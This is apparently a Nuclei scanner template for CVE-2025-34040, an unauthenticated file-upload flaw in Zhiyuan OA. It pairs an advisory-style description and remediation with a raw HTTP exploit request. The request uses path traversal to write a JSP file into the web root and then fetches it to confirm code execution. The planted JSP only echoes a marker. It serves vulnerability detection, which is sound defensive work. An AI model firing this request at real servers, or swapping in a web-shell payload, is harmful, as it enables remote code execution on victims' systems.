id: CVE-2025-34040

info:
  name: Zhiyuan OA Platform - Arbitrary File Upload
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    An arbitrary file upload vulnerability exists in the Zhiyuan OA platform 5.0, 5.1 - 5.6sp1, 6.0 - 6.1sp2, 7.0, 7.0sp1 - 7.1, 7.1sp1, and 8.0 - 8.0sp2 via the wpsAssistServlet interface. The realFileType and fileId parameters are improperly validated during multipart file uploads, allowing unauthenticated attackers to upload crafted JSP files outside of intended directories using path traversal. Successful exploitation enables remote code execution as the uploaded file can be accessed and executed through the web server.
  impact: |
    Unauthenticated attackers can upload malicious JSP files through path traversal in the wpsAssistServlet interface, achieving remote code execution on the Zhiyuan OA server.
  remediation: |
    Upgrade to Zhiyuan OA platform version 8.0sp3 or later that properly validates file upload paths and file types.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2025-34040
    - https://www.cnblogs.com/pursue-security/p/17677130.html
  classification:
    epss-score: 0.09679
    epss-percentile: 0.93111
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="seeyon/index.jsp"
  tags: cve,cve2025,file-upload,intrusive,zhiyuan,lfi,vkev,vuln

variables:
  marker: "{{randstr}}"
  filename: "{{randbase(8)}}"

http:
  - raw:
      - |
        POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/{{filename}}.jsp&fileId=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
        Accept-Encoding: gzip

        --59229605f98b8cf290a7b8908b34616b
        Content-Disposition: form-data; name="upload"; filename="123.xls"
        Content-Type: application/vnd.ms-excel

        <%@ page import="java.util.Base64" %><%= new String(Base64.getDecoder().decode("{{base64(marker)}}"), "UTF-8") %>
        --59229605f98b8cf290a7b8908b34616b--

    matchers:
      - type: word
        part: body
        words:
          - "officeTransResultFlag"
          - '"success":true'
        condition: and
        internal: true

  - raw:
      - |
        GET /{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "{{marker}}"
# digest: 4b0a00483046022100c114291cdd621a122f32d2d0a86a1c72ae1286c471bbb80f14da92d6ab8acdec022100bad7f9390594d6ba65b63e8d20cc3b9d787e9e9f7944c2dc681ce2d75cc52ecb:922c64590222798bb761d5b6d8e72950